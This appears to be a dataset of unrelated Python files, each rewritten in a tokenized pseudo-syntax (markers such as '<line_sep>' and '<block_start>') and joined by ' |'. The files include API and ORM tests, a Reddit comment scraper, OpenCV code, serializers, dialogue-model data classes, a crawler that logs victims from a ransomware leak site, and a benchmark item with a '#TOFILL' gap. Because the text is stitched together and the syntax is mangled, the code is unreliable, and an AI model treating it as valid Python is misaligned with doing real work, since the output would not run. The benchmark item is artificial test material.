@prefix('test_api_v0_override_multiple')<def_stmt>test_api_v0_override_multiple team user role event<block_start>team_name=team.create()<line_sep>role_name=role.create()<line_sep>user_name=user.create()<line_sep>override_user=user.create()<line_sep>user.add_to_team(user_name team_name)<line_sep>user.add_to_team(override_user team_name)<line_sep>ev1=event.create({'start':start-1000 'end':start+1000 'user':user_name 'team':team_name 'role':role_name})<line_sep>ev2=event.create({'start':start+1000 'end':start+2000 'user':user_name 'team':team_name 'role':role_name})<line_sep>ev3=event.create({'start':start+2000 'end':end-1000 'user':user_name 'team':team_name 'role':role_name})<line_sep>ev4=event.create({'start':end-1000 'end':end+1000 'user':user_name 'team':team_name 'role':role_name})<line_sep>re=override(start end [ev1 ev2 ev3 ev4] override_user)<assert_stmt>len(re.json())<eq>3<line_sep>re=requests.get(api_v0('events?user='+user_name))<line_sep>events=sorted(re.json() key=<lambda>x:x['start'])<assert_stmt>len(events)<eq>2<assert_stmt>events[0]['start']<eq>start-1000<assert_stmt>events[0]['end']<eq>start<assert_stmt>events[1]['start']<eq>end<assert_stmt>events[1]['end']<eq>end+1000<line_sep>re=requests.get(api_v0('events?user='+override_user))<line_sep>events=re.json()<assert_stmt>events[0]['start']<eq>start<assert_stmt>events[0]['end']<eq>end<block_end> |
<import_from_stmt>django.contrib.contenttypes.fields GenericRelation<import_from_stmt>django.db models<import_from_stmt>openbook_notifications.models.notification Notification<import_from_stmt>openbook_posts.models PostReaction<class_stmt>PostReactionNotification(models.Model)<block_start>notification=GenericRelation(Notification related_name='post_reaction_notifications')<line_sep>post_reaction=models.ForeignKey(PostReaction on_delete=models.CASCADE)<line_sep>@classmethod<def_stmt>create_post_reaction_notification cls post_reaction_id owner_id<block_start>post_reaction_notification=cls.objects.create(post_reaction_id=post_reaction_id)<line_sep>Notification.create_notification(type=Notification.POST_REACTION content_object=post_reaction_notification owner_id=owner_id)<line_sep><return>post_reaction_notification<block_end>@classmethod<def_stmt>delete_post_reaction_notification cls post_reaction_id owner_id<block_start>cls.objects.filter(post_reaction_id=post_reaction_id notification__owner_id=owner_id).delete()<block_end>@classmethod<def_stmt>delete_post_reaction_notifications cls post_reaction_id<block_start>cls.objects.filter(post_reaction_id=post_reaction_id).delete()<block_end><block_end> |
"""
This script uses the Pushshift API to download comments from the specified subreddits.
By default it downloads all the comments from the newest one to the first one of the specified date.
"""<import_stmt>csv<import_stmt>sys<import_stmt>time<import_from_stmt>datetime datetime<import_stmt>requests<line_sep># 10,000 should cover at least 3 years of comments.
sys.setrecursionlimit(10000)<line_sep>SUBREDDITS=["mexico"]<line_sep>HEADERS={"User-Agent":"Comments Downloader v0.2"}<line_sep>COMMENTS_LIST=list()<line_sep># Year month and day.
TARGET_DATE="2019-01-01"<line_sep>TARGET_TIMESTAMP=datetime.fromisoformat(TARGET_DATE).timestamp()<def_stmt>init <block_start>"""Iterates over all the subreddits and creates their csv files."""<for_stmt>subreddit SUBREDDITS<block_start>writer=csv.writer(open("./{}-comments.csv".format(subreddit) "w" newline="" encoding="utf-8"))<line_sep># Adding the header.
writer.writerow(["datetime" "author" "body"])<line_sep>print("Downloading:" subreddit)<line_sep>load_comments(subreddit writer)<block_end><block_end><def_stmt>load_comments subreddit writer latest_timestamp=<none><block_start>"""Keeps downloading comments using recursion, it saves them 500 at a time.
Parameters
----------
subreddit : str
The desired subreddit.
write: csv.writer
A writer object that will save the comments to disk.
latest_timestamp: int
The timestampf of the latest comment.
"""<line_sep>base_url="https://api.pushshift.io/reddit/comment/search/"<line_sep>params={"subreddit":subreddit "sort":"desc" "sort_type":"created_utc" "size":500}<line_sep>stop_loading=<false><line_sep># After the first call of this function we will use the 'before' parameter.
<if_stmt>latest_timestamp<ne><none><block_start>params["before"]=latest_timestamp<block_end><with_stmt>requests.get(base_url params=params headers=HEADERS)<as>response<block_start>json_data=response.json()<line_sep>total_comments=len(json_data["data"])<line_sep>latest_timestamp=0<line_sep>print("Downloading: {} comments".format(total_comments))<for_stmt>item json_data["data"]# We will only take 3 properties, the timestamp, author and body.
<block_start>latest_timestamp=item["created_utc"]<line_sep>iso_date=datetime.fromtimestamp(latest_timestamp)<if_stmt>latest_timestamp<le>TARGET_TIMESTAMP<block_start>stop_loading=<true><line_sep><break><block_end>COMMENTS_LIST.append([iso_date item["author"] item["body"]])<block_end>writer.writerows(COMMENTS_LIST)<line_sep>COMMENTS_LIST.clear()<if_stmt>total_comments<l>500<block_start>print("No more rโesults.")<block_end><elif_stmt>stop_loading<block_start>print("Download complete.")<block_end><else_stmt><block_start>time.sleep(1.2)<line_sep>load_comments(subreddit writer latest_timestamp)<block_end><block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>init()<block_end> |
# -*- coding: utf-8 -*-
# @Time : 2017/8/2 10:46
# @Author : play4fun
# @File : test_video.py
# @Software: PyCharm
"""
test_video.py:
"""<import_stmt>numpy<as>np<import_stmt>cv2<import_from_stmt>matplotlib pyplot<as>plt<line_sep>cap=cv2.VideoCapture('../../data/vtest.avi')#ไธๆฏๆ่ฏปๅ่ง้ข
# cap = cv2.VideoCapture('output.avi')
# cap = cv2.VideoCapture('Minions_banana.mp4')
# ๅธง็
fps=cap.get(cv2.CAP_PROP_FPS)# 25.0
print("Frames per second using video.get(cv2.CAP_PROP_FPS) : {0}".format(fps))<line_sep># ๆปๅ
ฑๆๅคๅฐๅธง
num_frames=cap.get(cv2.CAP_PROP_FRAME_COUNT)<line_sep>print('ๅ
ฑๆ' num_frames 'ๅธง')<line_sep>#
frame_height=cap.get(cv2.CAP_PROP_FRAME_HEIGHT)<line_sep>frame_width=cap.get(cv2.CAP_PROP_FRAME_WIDTH)<line_sep>print('้ซ๏ผ' frame_height 'ๅฎฝ๏ผ' frame_width)<line_sep>FRAME_NOW=cap.get(cv2.CAP_PROP_POS_FRAMES)# ็ฌฌ0ๅธง
print('ๅฝๅๅธงๆฐ' FRAME_NOW)# ๅฝๅๅธงๆฐ 0.0
# ่ฏปๅๆๅฎๅธง,ๅฏน่ง้ขๆไปถๆๆๆ๏ผๅฏนๆๅๅคดๆ ๆ๏ผ๏ผ
# frame_no = 121
# cap.set(1, frame_no) # Where frame_no is the frame you want
ret,frame=cap.read()# Read the frame
print(ret frame)<line_sep># cv2.imshow('frame_no'+str(frame_no), frame)
FRAME_NOW=cap.get(cv2.CAP_PROP_POS_FRAMES)<line_sep>print('ๅฝๅๅธงๆฐ' FRAME_NOW)# ๅฝๅๅธงๆฐ 122.0
<if_stmt>frame<is><not><none>#ๅบ้
<block_start>plt.imshow(frame)<line_sep># plt.imshow(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))
plt.show()<block_end> |
<import_stmt>pytest<import_stmt>sqlalchemy<as>sa<import_from_stmt>sqlalchemy_utils get_referencing_foreign_keys<class_stmt>TestGetReferencingFksWithCompositeKeys(object)<block_start>@pytest.fixture<def_stmt>User self Base<block_start><class_stmt>User(Base)<block_start>__tablename__='user'<line_sep>first_name=sa.Column(sa.Unicode(255) primary_key=<true>)<line_sep>last_name=sa.Column(sa.Unicode(255) primary_key=<true>)<block_end><return>User<block_end>@pytest.fixture<def_stmt>Article self Base User<block_start><class_stmt>Article(Base)<block_start>__tablename__='article'<line_sep>id=sa.Column(sa.Integer primary_key=<true>)<line_sep>author_first_name=sa.Column(sa.Unicode(255))<line_sep>author_last_name=sa.Column(sa.Unicode(255))<line_sep>__table_args__=(sa.ForeignKeyConstraint([author_first_name author_last_name] [User.first_name User.last_name]) )<block_end><return>Article<block_end>@pytest.fixture<def_stmt>init_models self User Article<block_start><pass><block_end><def_stmt>test_with_declarative_class self User Article<block_start>fks=get_referencing_foreign_keys(User)<assert_stmt>Article.__table__.foreign_keys<eq>fks<block_end><def_stmt>test_with_table self User Article<block_start>fks=get_referencing_foreign_keys(User.__table__)<assert_stmt>Article.__table__.foreign_keys<eq>fks<block_end><block_end><class_stmt>TestGetReferencingFksWithInheritance(object)<block_start>@pytest.fixture<def_stmt>User self Base<block_start><class_stmt>User(Base)<block_start>__tablename__='user'<line_sep>id=sa.Column(sa.Integer primary_key=<true>)<line_sep>type=sa.Column(sa.Unicode)<line_sep>first_name=sa.Column(sa.Unicode(255))<line_sep>last_name=sa.Column(sa.Unicode(255))<line_sep>__mapper_args__={'polymorphic_on':'type'}<block_end><return>User<block_end>@pytest.fixture<def_stmt>Admin self User<block_start><class_stmt>Admin(User)<block_start>__tablename__='admin'<line_sep>id=sa.Column(sa.Integer sa.ForeignKey(User.id) primary_key=<true>)<block_end><return>Admin<block_end>@pytest.fixture<def_stmt>TextItem self Base User<block_start><class_stmt>TextItem(Base)<block_start>__tablename__='textitem'<line_sep>id=sa.Column(sa.Integer primary_key=<true>)<line_sep>type=sa.Column(sa.Unicode)<line_sep>author_id=sa.Column(sa.Integer sa.ForeignKey(User.id))<line_sep>__mapper_args__={'polymorphic_on':'type'}<block_end><return>TextItem<block_end>@pytest.fixture<def_stmt>Article self TextItem<block_start><class_stmt>Article(TextItem)<block_start>__tablename__='article'<line_sep>id=sa.Column(sa.Integer sa.ForeignKey(TextItem.id) primary_key=<true>)<line_sep>__mapper_args__={'polymorphic_identity':'article'}<block_end><return>Article<block_end>@pytest.fixture<def_stmt>init_models self User Admin TextItem Article<block_start><pass><block_end><def_stmt>test_with_declarative_class self Admin TextItem<block_start>fks=get_referencing_foreign_keys(Admin)<assert_stmt>TextItem.__table__.foreign_keys<eq>fks<block_end><def_stmt>test_with_table self Admin<block_start>fks=get_referencing_foreign_keys(Admin.__table__)<assert_stmt>fks<eq>set([])<block_end><block_end> |
# Copyright 1999-2021 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
<import_from_stmt>typing Union List Dict Any<import_from_stmt>.core Serializer buffered<try_stmt><block_start><import_stmt>pyarrow<as>pa<line_sep>pa_types=Union[pa.Table pa.RecordBatch]<block_end><except_stmt>ImportError# pragma: no cover
<block_start>pa=<none><line_sep>pa_types=Any<block_end><class_stmt>ArrowBatchSerializer(Serializer)<block_start>serializer_name='arrow'<line_sep>@buffered<def_stmt>serialize self obj:pa_types context:Dict<block_start>header={}<line_sep>sink=pa.BufferOutputStream()<line_sep>writer=pa.RecordBatchStreamWriter(sink obj.schema)<if_stmt>isinstance(obj pa.Table)<block_start>header['type']='Table'<line_sep>writer.write_table(obj)<block_end><else_stmt><block_start>header['type']='Batch'<line_sep>writer.write_batch(obj)<block_end>writer.close()<line_sep>buf=sink.getvalue()<line_sep>buffers=[buf]<line_sep><return>header buffers<block_end><def_stmt>deserialize self header:Dict buffers:List context:Dict<block_start>reader=pa.RecordBatchStreamReader(pa.BufferReader(buffers[0]))<if_stmt>header['type']<eq>'Table'<block_start><return>reader.read_all()<block_end><else_stmt><block_start><return>reader.read_next_batch()<block_end><block_end><block_end><if_stmt>pa<is><not><none># pragma: no branch
<block_start>ArrowBatchSerializer.register(pa.Table)<line_sep>ArrowBatchSerializer.register(pa.RecordBatch)<block_end> |
<import_stmt>package<import_stmt>helper<import_stmt>package.assistant<line_sep>#We expect that 'a' below will be 1 not a module.
<import_from_stmt>confused_elements a<import_stmt>sys<line_sep> |
<import_from_stmt>typing List<import_stmt>numpy<as>np<line_sep># todo remove boilerplate duplications
# todo comments
# todo logging
# todo naming
<import_from_stmt>deeppavlov.models.go_bot.nlu.dto.nlu_response NLUResponse<import_from_stmt>deeppavlov.models.go_bot.policy.dto.digitized_policy_features DigitizedPolicyFeatures<import_from_stmt>deeppavlov.models.go_bot.tracker.dto.dst_knowledge DSTKnowledge<import_from_stmt>copy deepcopy<class_stmt>UtteranceFeatures<block_start>"""
the DTO-like class storing the training features of a single utterance of a dialog
(to feed the GO-bot policy model)
"""<line_sep>action_mask:np.ndarray<line_sep>attn_key:np.ndarray<line_sep>tokens_embeddings_padded:np.ndarray<line_sep>features:np.ndarray<def_stmt>__init__ self nlu_response:NLUResponse tracker_knowledge:DSTKnowledge features:DigitizedPolicyFeatures<block_start>self.action_mask=features.action_mask<line_sep>self.attn_key=features.attn_key<line_sep>tokens_vectorized=nlu_response.tokens_vectorized# todo proper oop
self.tokens_embeddings_padded=tokens_vectorized.tokens_embeddings_padded<line_sep>self.features=features.concat_feats<block_end><block_end><class_stmt>UtteranceTarget<block_start>"""
the DTO-like class storing the training target of a single utterance of a dialog
(to feed the GO-bot policy model)
"""<line_sep>action_id:int<def_stmt>__init__ self action_id<block_start>self.action_id=action_id<block_end><block_end><class_stmt>UtteranceDataEntry<block_start>"""
the DTO-like class storing both the training features and target
of a single utterance of a dialog (to feed the GO-bot policy model)
"""<line_sep>features:UtteranceFeatures<line_sep>target:UtteranceTarget<def_stmt>__init__ self features target<block_start>self.features=features<line_sep>self.target=target<block_end>@staticmethod<def_stmt>from_features_and_target features:UtteranceFeatures target:UtteranceTarget<block_start><return>UtteranceDataEntry(deepcopy(features) deepcopy(target))<block_end>@staticmethod<def_stmt>from_features features:UtteranceFeatures<block_start><return>UtteranceDataEntry(deepcopy(features) UtteranceTarget(<none>))<block_end><block_end><class_stmt>DialogueFeatures<block_start>"""
the DTO-like class storing both the training features
of a dialog (to feed the GO-bot policy model)
"""<line_sep>action_masks:List[np.ndarray]<line_sep>attn_keys:List[np.ndarray]<line_sep>tokens_embeddings_paddeds:List[np.ndarray]<line_sep>featuress:List[np.ndarray]<def_stmt>__init__ self<block_start>self.action_masks=[]<line_sep>self.attn_keys=[]<line_sep>self.tokens_embeddings_paddeds=[]<line_sep>self.featuress=[]<block_end><def_stmt>append self utterance_features:UtteranceFeatures<block_start>self.action_masks.append(utterance_features.action_mask)<line_sep>self.attn_keys.append(utterance_features.attn_key)<line_sep>self.tokens_embeddings_paddeds.append(utterance_features.tokens_embeddings_padded)<line_sep>self.featuress.append(utterance_features.features)<block_end><def_stmt>__len__ self<block_start><return>len(self.featuress)<block_end><block_end><class_stmt>DialogueTargets<block_start>"""
the DTO-like class storing both the training targets
of a dialog (to feed the GO-bot policy model)
"""<line_sep>action_ids:List[int]<def_stmt>__init__ self<block_start>self.action_ids=[]<block_end><def_stmt>append self utterance_target:UtteranceTarget<block_start>self.action_ids.append(utterance_target.action_id)<block_end><def_stmt>__len__ self<block_start><return>len(self.action_ids)<block_end><block_end><class_stmt>DialogueDataEntry<block_start>"""
the DTO-like class storing both the training features and targets
of a dialog (to feed the GO-bot policy model)
"""<line_sep>features:DialogueFeatures<line_sep>targets:DialogueTargets<def_stmt>__init__ self<block_start>self.features=DialogueFeatures()<line_sep>self.targets=DialogueTargets()<block_end><def_stmt>append self utterance_features:UtteranceDataEntry<block_start>self.features.append(utterance_features.features)<line_sep>self.targets.append(utterance_features.target)<block_end><def_stmt>__len__ self<block_start><return>len(self.features)<block_end><block_end><class_stmt>PaddedDialogueFeatures(DialogueFeatures)<block_start>"""
the DTO-like class storing both the **padded to some specified length** training features
of a dialog (to feed the GO-bot policy model)
"""<line_sep>padded_dialogue_length_mask:List[int]<def_stmt>__init__ self dialogue_features:DialogueFeatures sequence_length<block_start>super().__init__()<line_sep>padding_length=sequence_length-len(dialogue_features)<line_sep>self.padded_dialogue_length_mask=[1]<times>len(dialogue_features)+[0]<times>padding_length<line_sep>self.action_masks=dialogue_features.action_masks+[np.zeros_like(dialogue_features.action_masks[0])]<times>padding_length<line_sep>self.attn_keys=dialogue_features.attn_keys+[np.zeros_like(dialogue_features.attn_keys[0])]<times>padding_length<line_sep>self.tokens_embeddings_paddeds=dialogue_features.tokens_embeddings_paddeds+[np.zeros_like(dialogue_features.tokens_embeddings_paddeds[0])]<times>padding_length<line_sep>self.featuress=dialogue_features.featuress+[np.zeros_like(dialogue_features.featuress[0])]<times>padding_length<block_end><block_end><class_stmt>PaddedDialogueTargets(DialogueTargets)<block_start>"""
the DTO-like class storing both the **padded to some specified length** training targets
of a dialog (to feed the GO-bot policy model)
"""<def_stmt>__init__ self dialogue_targets:DialogueTargets sequence_length<block_start>super().__init__()<line_sep>padding_length=sequence_length-len(dialogue_targets)<line_sep>self.action_ids=dialogue_targets.action_ids+[0]<times>padding_length<block_end><block_end><class_stmt>PaddedDialogueDataEntry(DialogueDataEntry)<block_start>"""
the DTO-like class storing both the **padded to some specified length** training features and targets
of a dialog (to feed the GO-bot policy model)
"""<line_sep>features:PaddedDialogueFeatures<line_sep>targets:PaddedDialogueTargets<def_stmt>__init__ self dialogue_data_entry:DialogueDataEntry sequence_length<block_start>super().__init__()<line_sep>self.features=PaddedDialogueFeatures(dialogue_data_entry.features sequence_length)<line_sep>self.targets=PaddedDialogueTargets(dialogue_data_entry.targets sequence_length)<block_end><block_end><class_stmt>BatchDialoguesFeatures<block_start>"""
the DTO-like class storing both the training features
of a batch of dialogues. (to feed the GO-bot policy model)
"""<line_sep>b_action_masks:List[List[np.ndarray]]<line_sep>b_attn_keys:List[List[np.ndarray]]<line_sep>b_tokens_embeddings_paddeds:List[List[np.ndarray]]<line_sep>b_featuress:List[List[np.ndarray]]<line_sep>b_padded_dialogue_length_mask:List[List[int]]<line_sep>max_dialogue_length:int<def_stmt>__init__ self max_dialogue_length<block_start>self.b_action_masks=[]<line_sep>self.b_attn_keys=[]<line_sep>self.b_tokens_embeddings_paddeds=[]<line_sep>self.b_featuress=[]<line_sep>self.b_padded_dialogue_length_mask=[]<line_sep>self.max_dialogue_length=max_dialogue_length<block_end><def_stmt>append self padded_dialogue_features:PaddedDialogueFeatures<block_start>self.b_action_masks.append(padded_dialogue_features.action_masks)<line_sep>self.b_attn_keys.append(padded_dialogue_features.attn_keys)<line_sep>self.b_tokens_embeddings_paddeds.append(padded_dialogue_features.tokens_embeddings_paddeds)<line_sep>self.b_featuress.append(padded_dialogue_features.featuress)<line_sep>self.b_padded_dialogue_length_mask.append(padded_dialogue_features.padded_dialogue_length_mask)<block_end><def_stmt>__len__ self<block_start><return>len(self.b_featuress)<block_end><block_end><class_stmt>BatchDialoguesTargets<block_start>"""
the DTO-like class storing both the training targets
of a batch of dialogues. (to feed the GO-bot policy model)
"""<line_sep>b_action_ids:List[List[int]]<line_sep>max_dialogue_length:int<def_stmt>__init__ self max_dialogue_length<block_start>self.b_action_ids=[]<line_sep>self.max_dialogue_length=max_dialogue_length<block_end><def_stmt>append self padded_dialogue_targets:PaddedDialogueTargets<block_start>self.b_action_ids.append(padded_dialogue_targets.action_ids)<block_end><def_stmt>__len__ self<block_start><return>len(self.b_action_ids)<block_end><block_end><class_stmt>BatchDialoguesDataset<block_start>"""
the DTO-like class storing both the training features and target
of a batch of dialogues. (to feed the GO-bot policy model)
Handles the dialogues padding.
"""<line_sep>features:BatchDialoguesFeatures<line_sep>targets:BatchDialoguesTargets<def_stmt>__init__ self max_dialogue_length<block_start>self.features=BatchDialoguesFeatures(max_dialogue_length)<line_sep>self.targets=BatchDialoguesTargets(max_dialogue_length)<line_sep>self.max_dialogue_length=max_dialogue_length<block_end><def_stmt>append self dialogue_features:DialogueDataEntry<block_start>padded_dialogue_features=PaddedDialogueDataEntry(dialogue_features self.max_dialogue_length)<line_sep>self.features.append(padded_dialogue_features.features)<line_sep>self.targets.append(padded_dialogue_features.targets)<block_end><def_stmt>__len__ self<block_start><return>len(self.features)<block_end><block_end> |
<import_stmt>torch<import_from_stmt>self_attention_cv AxialAttentionBlock<def_stmt>test_axial_att <block_start>device='cuda'<if>torch.cuda.is_available()<else>'cpu'<line_sep>model=AxialAttentionBlock(in_channels=256 dim=64 heads=8).to(device)<line_sep>x=torch.rand(1 256 64 64).to(device)# [batch, tokens, dim, dim]
y=model(x)<assert_stmt>y.shape<eq>x.shape<line_sep>print('AxialAttentionBlockAISummer OK')<block_end> |
<import_from_stmt>datetime datetime<line_sep>TEN_MINS=600<line_sep>ONE_HOUR=3600<line_sep>TWO_HOURS=7200<line_sep>ONE_DAY=86400<def_stmt>fuzzy event base=<none> date_format=<none><block_start><if_stmt><not>base<block_start>base=datetime.now()<block_end><if_stmt>date_format<block_start>event=datetime.strptime(event date_format)<block_end><elif_stmt>type(event)<eq>str<block_start>event=datetime.fromtimestamp(int(event))<block_end><elif_stmt>type(event)<eq>int<block_start>event=datetime.fromtimestamp(event)<block_end><elif_stmt>type(event)<ne>datetime<block_start><raise>Exception("Cannot convert object `{}` to fuzzy date string".format(event))<block_end>delta=base-event<if_stmt>delta.days<eq>0<block_start><if_stmt>delta.seconds<l>60<block_start><return>"{} seconds ago".format(delta.seconds)<block_end><elif_stmt>delta.seconds<l>120<block_start><return>"1 min and {} secs ago".format(delta.seconds-60)<block_end><elif_stmt>delta.seconds<l>TEN_MINS<block_start><return>"{} mins and {} secs ago".format(delta.seconds<floordiv>60 delta.seconds%60)<block_end><elif_stmt>delta.seconds<l>ONE_HOUR<block_start><return>"{} minutes ago".format(delta.seconds<floordiv>60)<block_end><elif_stmt>delta.seconds<l>TWO_HOURS<block_start><return>"1 hour and {} mins ago".format(delta.seconds%ONE_HOUR<floordiv>60)<block_end><return>"over {} hours ago".format(delta.seconds<floordiv>ONE_HOUR)<block_end><elif_stmt>delta.days<l>2<block_start><return>"over a day ago"<block_end><elif_stmt>delta.days<l>7<block_start><return>"over {} days ago".format(delta.days)<block_end><return>"{date:%b} {date.day}, {date.year}".format(date=event)<block_end> |
# Copyright (c) 2019-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
#
<def_stmt>f_gold arr1 arr2 m n x<block_start>count,l,r=0 0 n-1<while_stmt>(l<l>m<and>r<ge>0)<block_start><if_stmt>((arr1[l]+arr2[r])<eq>x)<block_start>l<augadd>1<line_sep>r<augsub>1<line_sep>count<augadd>1<block_end><elif_stmt>((arr1[l]+arr2[r])<l>x)<block_start>l<augadd>1<block_end><else_stmt><block_start>r<augsub>1<block_end><block_end><return>count<block_end>#TOFILL
<if_stmt>__name__<eq>'__main__'<block_start>param=[([5 5 7 10 14 14 17 21 32 34 37 40 40 40 46 46 50 50 51 55 57 62 65 67 67 69 70 70 72 73 76 77 77 78 84 85 85 86 87 88 88 89 89 90 93 99] [2 5 8 8 10 12 13 15 17 18 20 20 21 27 28 31 34 37 40 46 48 52 53 54 54 58 59 60 66 68 68 69 70 71 72 73 77 77 80 84 84 92 92 95 97 97] 28 29 23 ) ([-84 52 -34 96 16 92 -64 -74] [-22 26 -12 -54 66 86 38 76] 6 5 7 ) ([0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1] [0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1] 37 26 42 ) ([60 92 42 83 55 76 29 62] [71 2 74 42 80 71 26 76] 4 7 7 ) ([-94 -94 -58 -40 -40 -26 -24 -22 -22 -22 -2 0 4 8 12 16 16 18 22 32 42 44 50 58 64 78 80 90] [-86 -84 -78 -76 -72 -70 -62 -58 -54 -54 -50 -46 -44 -40 -30 -28 -16 -10 10 36 36 48 70 84 84 90 94 98] 17 27 17 ) ([0 0 1 1 1 0 0 1 1 1] [1 1 1 0 1 1 0 0 0 0] 5 8 9 ) ([1 5 7 7 7 14 15 16 17 18 18 19 20 25 27 31 36 42 47 51 56 56 56 58 58 59 63 63 63 65 66 67 76 83 93 94 97] [2 3 7 8 9 10 17 18 21 28 29 29 33 35 46 47 47 49 49 49 53 56 58 59 59 60 65 67 70 78 81 85 85 87 90 92 96] 28 34 31 ) ([78 -74 52 56 -8 92 14 56 -72 -92 32 -94 -26 -8 -66 72 -24 36 -84 -4 -68 14 78 40 -82 -10 16 56 6 -16 30 24 -32] [-74 22 -14 -2 36 86 -70 -20 -76 -84 -40 -36 42 22 -60 -94 -18 8 -14 -42 -68 62 -60 2 40 -66 68 96 70 98 -38 -74 -92] 16 30 24 ) ([0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 1 1 1 1 1 1 1 1 1 1 1 1 1] [0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1] 25 33 33 ) ([17 50 65 4 19 10 45 70 76 81 28 97 55 70 38 2 40 67 36 33 6 85 25] [78 92 65 23 7 94 18 4 2 53 31 58 98 18 46 16 17 92 80 92 43 70 50] 16 22 22 )]<line_sep>n_success=0<for_stmt>i,parameters_set enumerate(param)<block_start><if_stmt>f_filled(*parameters_set)<eq>f_gold(*parameters_set)<block_start>n_success<augadd>1<block_end><block_end>print("#Results: %i, %i"%(n_success len(param)))<block_end> |
<import_stmt>sys<line_sep>sys.exit(1)<line_sep> |
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
<import_from_stmt>contrib.cluster_telemetry ct_benchmarks_util<import_from_stmt>contrib.cluster_telemetry page_set<import_from_stmt>contrib.cluster_telemetry repaint_helpers<import_from_stmt>benchmarks rasterize_and_record_micro<line_sep># pylint: disable=protected-access
<class_stmt>RasterizeAndRecordMicroCT(rasterize_and_record_micro._RasterizeAndRecordMicro)<block_start>"""Measures rasterize and record performance for Cluster Telemetry."""<line_sep>@classmethod<def_stmt>Name cls<block_start><return>'rasterize_and_record_micro_ct'<block_end>@classmethod<def_stmt>AddBenchmarkCommandLineArgs cls parser<block_start>(rasterize_and_record_micro._RasterizeAndRecordMicro.AddBenchmarkCommandLineArgs(parser))<line_sep>ct_benchmarks_util.AddBenchmarkCommandLineArgs(parser)<block_end>@classmethod<def_stmt>ProcessCommandLineArgs cls parser args<block_start>ct_benchmarks_util.ValidateCommandLineArgs(parser args)<block_end><def_stmt>CreateStorySet self options<block_start><return>page_set.CTPageSet(options.urls_list options.user_agent options.archive_data_file run_page_interaction_callback=repaint_helpers.WaitThenRepaint)<block_end><block_end> |
<import_from_stmt>datetime datetime<import_stmt>logging<import_from_stmt>bs4 BeautifulSoup<import_from_stmt>db.models Victim<import_from_stmt>net.proxy Proxy<import_from_stmt>.sitecrawler SiteCrawler<import_stmt>time<class_stmt>Nefilim(SiteCrawler)<block_start>actor="Nefilim"<def_stmt>_handle_page self soup<block_start>victim_list=soup.find_all("header" class_="entry-header")<for_stmt>victim victim_list<block_start>victim_title=victim.find("h2" class_="entry-title").text.strip()<line_sep>victim_name=victim_title[0:victim_title.find(". Part")]<line_sep>meta=victim.find("div" class_="entry-meta")<line_sep>published=meta.find("time" class_="entry-date").attrs["datetime"]<line_sep>published_dt=datetime.strptime(published.strip()[:-6] "%Y-%m-%dT%H:%M:%S")<line_sep>victim_leak_site=meta.find("span" class_="posted-on").find("a").attrs["href"]<line_sep>q=self.session.query(Victim).filter_by(url=victim_leak_site site=self.site)<if_stmt>q.count()<eq>0# new victim
<block_start>v=Victim(name=victim_name url=victim_leak_site published=published_dt first_seen=datetime.utcnow() last_seen=datetime.utcnow() site=self.site)<line_sep>self.session.add(v)<line_sep>self.new_victims.append(v)<block_end><else_stmt># already seen, update last_seen
<block_start>v=q.first()<line_sep>v.last_seen=datetime.utcnow()<block_end>self.current_victims.append(v)<block_end>self.session.commit()<line_sep># server was timing out so slows it down a bit
time.sleep(1.0)<block_end><def_stmt>scrape_victims self<block_start><with_stmt>Proxy()<as>p<block_start>r=p.get(f"{self.url}" headers=self.headers)<line_sep>soup=BeautifulSoup(r.content.decode() "html.parser")<line_sep>page_count=0<while_stmt><true><block_start>page_nav=soup.find("div" class_="nav-previous")<if_stmt>page_nav<is><none><block_start><break><block_end>url=page_nav.find("a").attrs["href"]<line_sep>r=p.get(f"{url}" headers=self.headers)<line_sep>soup=BeautifulSoup(r.content.decode() "html.parser")<line_sep>self._handle_page(soup)<block_end><block_end><block_end><block_end> |
# This sample tests the type checker's ability to handle
# custom subclasses of property.
<import_from_stmt>typing Any Callable<class_stmt>custom_property1(property)<block_start><pass><block_end><class_stmt>Custom1(object)<block_start>@custom_property1<def_stmt>x self<arrow>int<block_start><return>3<block_end>@custom_property1<def_stmt>y self<arrow>float<block_start><return>3.5<block_end>@y.setter<def_stmt>y self val:float<block_start><pass><block_end>@y.deleter<def_stmt>y self<block_start><pass><block_end><block_end>m1=Custom1()<line_sep>a1:int=m1.x<line_sep># This should generate an error because m.x is
# an int and cannot be assigned to str.
b1:str=m1.x<line_sep>c1:float=m1.y<line_sep># This should generate an error because m.y is
# a float and cannot be assigned to int.
d1:int=m1.y<line_sep># This should generate an error because there
# is no setter for x.
m1.x=4<line_sep>m1.y=4<line_sep># This should generate an error because there is
# no deleter for x.
<del_stmt>m1.x<del_stmt>m1.y<class_stmt>custom_property2(property)<block_start>_custom_func:Callable[<ellipsis> Any]|<none><def_stmt>custom_function self _custom_func:Callable[<ellipsis> Any]<block_start>self._custom_func=_custom_func<line_sep><return>self<block_end><block_end><class_stmt>Custom2(object)<block_start>@custom_property2<def_stmt>x self<arrow>int<block_start><return>3<block_end>@custom_property2<def_stmt>y self<arrow>float<block_start><return>3.5<block_end>@y.setter<def_stmt>y self val:float<block_start><pass><block_end>@y.deleter<def_stmt>y self<block_start><pass><block_end>@y.custom_function<def_stmt>y self<block_start><pass><block_end><block_end>m2=Custom2()<line_sep>a2=m2.y<line_sep>reveal_type(a2 expected_text="float")<line_sep>m2.y=4<del_stmt>m2.y<line_sep> |
